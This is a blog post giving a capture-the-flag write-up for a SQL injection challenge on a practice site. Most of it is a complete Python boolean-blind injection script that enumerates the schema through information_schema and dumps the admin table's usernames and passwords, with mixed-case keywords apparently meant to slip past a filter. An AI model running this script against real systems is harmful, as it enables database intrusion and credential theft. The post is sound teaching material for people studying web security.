
26.看起來有點難

web安全 sql註入 sqli ctf sqlmap

這題進入以後先用時間盲注測試了一下,確認存在注入。下面的腳本實際上改用的是布爾盲注:以頁面回顯「登錄失敗,錯誤的用戶名和密碼」作為注入條件為真的判斷依據(條件為假時回顯不同),逐位爆破:

之後就是自己寫了個代碼:(寫的比較破,將就看看)

#!/usr/bin/python
#coding=utf-8

import requests
import sys

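# Boolean-blind oracle shared by length() and blast().
#
# NOTE(review): the target is the shiyanbar CTF practice host from the original
# write-up. Only point this at systems you are authorised to test.
TARGET_URL = "http://ctf5.shiyanbar.com/basic/inject/index.php"
# Response text that the application returns when the injected condition is
# TRUE (the OR makes the WHERE match a row, then the password check fails).
TRUE_MARKER = u"登錄失敗,錯誤的用戶名和密碼"
# The original requests.get() had no timeout and could block forever.
REQUEST_TIMEOUT = 10


def _ask_target(condition):
    """Send one blind probe and return True iff the SQL `condition` held.

    The injection point is the `admin` parameter, which becomes
    `1' or if(<condition>,1,0)#`.  Values are passed through `params=` so
    requests URL-encodes the quote, `#` and `&` for us (the original
    hand-built the query string with %23 / %26).  The body is decoded as GBK
    before TRUE_MARKER is looked up, as in the original script.

    Raises whatever `requests` raises on timeout or connection failure; the
    caller decides whether to retry.
    """
    params = {
        "admin": "1' or if(%s,1,0)#" % condition,
        "pass": "[d,b,c]",
        "action": "login",
    }
    resp = requests.get(TARGET_URL, params=params, timeout=REQUEST_TIMEOUT)
    resp.encoding = "gbk"
    return TRUE_MARKER in resp.text


def length(strs, oracle=None, max_len=100):
    """Return the integer value of the scalar SQL expression `strs`.

    `strs` is a query or expression yielding a small non-negative integer,
    e.g. `Select length(database())` or `Select count(username) from admin`.
    The condition `(<strs>)=<n>` is asked for n = 0, 1, ... max_len-1 and the
    first value the oracle confirms is returned.  (The original started at 1,
    so a genuine 0 -- an empty table -- was never found.)

    `oracle` is a callable taking a SQL boolean condition string and returning
    True when it holds on the target; it defaults to the live HTTP probe.
    Injecting it keeps the search logic testable without network access.

    Raises RuntimeError when no value in range is confirmed.  The original
    silently returned None here, which later crashed `blast()` with a
    TypeError inside range().
    """
    if oracle is None:
        oracle = _ask_target
    for n in range(max_len):
        if oracle("(%s)=%d" % (strs, n)):
            return n
    raise RuntimeError("no value in [0, %d) confirmed for: %s" % (max_len, strs))


def blast(lens, strs, oracle=None):
    """Recover the `lens`-character string produced by the SQL expression `strs`.

    Each character is rebuilt from 8 probes, one per bit: for the 1-based
    position `pos` (what substring() expects) and bit value `bit`, the
    condition `ascii(substring((<strs>),<pos>,1))&<bit>=<bit>` is asked; bits
    are tested LSB first and OR-ed into one byte, which is the same value the
    original assembled as a binary string and fed to int(s, 2).

    The original payload for this function carried a stray `select` after
    `or` that the length() payload did not have; both now go through the
    single `_ask_target` payload.  Only single-byte characters are reproduced
    faithfully: chr() of a value above 127 is not the original byte.

    `oracle` as in `length()`.  Returns "" when `lens` is 0.
    """
    if oracle is None:
        oracle = _ask_target
    chars = []
    for pos in range(1, lens + 1):
        value = 0
        for shift in range(8):
            bit = 1 << shift
            if oracle("ascii(substring((%s),%d,1))&%d=%d" % (strs, pos, bit, bit)):
                value |= bit
        chars.append(chr(value))
    return "".join(chars)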

# Multi-row extraction (several tables / several columns), one row per pass.
def plural(name, name_len, num):
    """Recover `num` values of a multi-row query, row by row.

    `name` selects the value (e.g. `selEct table_name from ...`) and
    `name_len` selects its length.  Both get a ` limit <i>,1` suffix so each
    pass targets a single row; the row's length comes from `length()` and its
    text from `blast()`.  Returns the recovered strings in row order.
    """
    recovered = []
    for row in range(num):
        limit_clause = " limit %d,1" % row
        row_len = length(name_len + limit_clause)
        recovered.append(blast(row_len, name + limit_clause))
    return recovered
    
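# Schema facts recovered by earlier runs of _enumerate_schema(): the app uses
# database `test`, whose `admin` table holds the credentials.
DB_NAME = "test"
TABLE_NAME = "admin"


def _enumerate_schema():
    """Recon steps from the original write-up, kept as a runnable reference.

    Discovers the database name, its tables and the columns of the admin table
    via information_schema.  Every character costs eight HTTP round-trips, so
    `main()` skips this and uses DB_NAME / TABLE_NAME directly.

    The mixed-case `selEct` / `seleCt` spellings are preserved from the
    original; they look like a keyword-filter bypass, so keep them if you reuse
    these queries (not verified here).  The original also used a curly quote
    (U+2018) around 'test' / 'admin', a copy-paste artefact that MySQL would
    not accept; plain ASCII quotes are used below.
    """
    db_len = length("Select length(database())")
    print(blast(db_len, "database()"))

    schema = "table_schema='%s'" % DB_NAME
    tb_count = length("Select count(table_name) from information_schema.tables where " + schema)
    print(plural("selEct table_name from information_schema.tables where " + schema,
                 "selEct length(table_name) from information_schema.tables where " + schema,
                 tb_count))

    where_tb = "table_name='%s'" % TABLE_NAME
    col_count = length("Select count(column_name) from information_schema.columns where " + where_tb)
    print(plural("selEct column_name from information_schema.columns where " + where_tb,
                 "selEct length(column_name) from information_schema.columns where " + where_tb,
                 col_count))


def _dump_column(column):
    """Print every value of `column` in the admin table as a list."""
    rows = length("Select count(%s) from %s" % (column, TABLE_NAME))
    values = plural("seleCt %s from %s" % (column, TABLE_NAME),
                    "Select length(%s) from %s" % (column, TABLE_NAME),
                    rows)
    print(values)


def main():
    """Dump the admin usernames, then the passwords (last step of the write-up)."""
    _dump_column("username")
    _dump_column("password")


if __name__ == "__main__":
    main()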

將得到的username,password輸入就可以了


還有一個方法就是,直接sqlmap神器,簡單粗暴,簡直不要太好用了,我就不上圖了


本文出自 “11846238” 博客,請務必保留此出處http://11856238.blog.51cto.com/11846238/1953705
